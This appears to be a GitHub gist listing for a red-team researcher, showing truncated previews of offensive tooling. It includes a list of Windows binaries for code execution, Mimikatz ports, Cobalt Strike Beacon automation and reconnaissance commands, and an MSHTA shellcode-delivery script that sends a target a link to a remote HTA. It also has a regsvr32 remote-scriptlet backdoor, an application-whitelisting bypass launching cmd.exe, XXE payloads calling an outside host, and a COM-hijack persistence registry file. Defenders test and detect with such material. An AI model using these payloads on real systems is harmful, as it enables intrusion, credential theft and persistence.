Oddvar Moe api0cradle
api0cradle
/ gist:7c774561d50dc50b67e072f49605f235
Created
November 3, 2017 07:23
— forked from trustedsec/gist:686057a1b8cdf3e580c57b211b263abe
List of applications for code execution via legit binaries
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Rundll32.exe | |
| Regsvr32.exe | |
| Mshta.exe | |
| Msbuild.exe | |
| Cbd.exe | |
| Csc.exe | |
| Tracker.exe | |
| Ntsd.exe | |
| Bginfo.exe | |
| Kd.exe |
api0cradle
/ katz.cs
Created
August 1, 2018 06:51
Updated Katz.cs - Latest Mimikatz, I mean honestly it is 2018...
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.EnterpriseServices; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; | |
| /* |
api0cradle
/ initial.cna
Created
February 20, 2019 20:37
— forked from rsmudge/initial.cna
How to automate Beacon to execute a sequence of tasks with each checkin...
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Demonstrate how to queue tasks to execute with each checkin... | |
| # | |
| # | |
| # yield tells a function to pause and return a value. The next time the same instance of the | |
| # function is called, it will resume after where it last yielded. | |
| # | |
| sub stuffToDo { | |
| # Tasks for first checkin |
api0cradle
/ TestMSHTAShellcodeDelivery.ps1
Created
April 11, 2019 06:21
MSHTA Test For Defenders - hosts hta in PowerShell, connected remotely and execute.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta | |
| To change your server, simply find and replace 192.168.1.1 with your server in the code. | |
| #> | |
| <# | |
| Moving Credtis for CACTUSTORCH HERE | |
| I was in escape sequcence hell ;-) | |
| ' ( ) ( ) |
api0cradle
/ cobaltstrike_sa.txt
Last active
December 29, 2021 14:56
— forked from HarmJ0y/cobaltstrike_sa.txt
Cobalt Strike Situational Awareness Commands
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows version: | |
| reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion | |
| Users who have authed to the system: | |
| ls C:\Users\ | |
| System env variables: | |
| reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment | |
| Saved outbound RDP connections: |
api0cradle
/ Backdoor-Minimalist.sct
Last active
April 30, 2021 13:07
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <!-- License: BSD3-Clause --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
api0cradle
/ gist:91c9262a8697da87ea10bfee8a5f05c5
Created
April 30, 2018 08:22
WMIKatz - Are you afraid
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0"> | |
| <!-- Copyright (c) Microsoft Corporation. All rights reserved. --> | |
| <xsl:output method="text" omit-xml-declaration="yes" indent="no"/> | |
| <xsl:strip-space elements="*" /> | |
| <ms:script implements-prefix="user" language="JScript"> | |
| <![CDATA[ | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'PoC code: Application whitelisting bypass using bginfo | |
| 'Author: @oddvarmoe - http://oddvar.moe | |
| strProgram = "cmd.exe" | |
| strPath = "C:\windows\system32" | |
| Set fso = CreateObject("Scripting.FileSystemObject") | |
| strCommand = fso.BuildPath(strPath, strProgram) | |
| Set app = CreateObject("Shell.Application") |
api0cradle
/ XXE_payloads
Created
August 15, 2017 07:46
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
api0cradle
/ winlogon.reg
Created
February 11, 2018 21:17
— forked from anonymous/winlogon.reg
WinLogon Windows 7 x64 COM Hijack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00] | |
| @="AtomicRedTeam" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID] | |
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam] | |
| @="AtomicRedTeam" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID] | |
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] |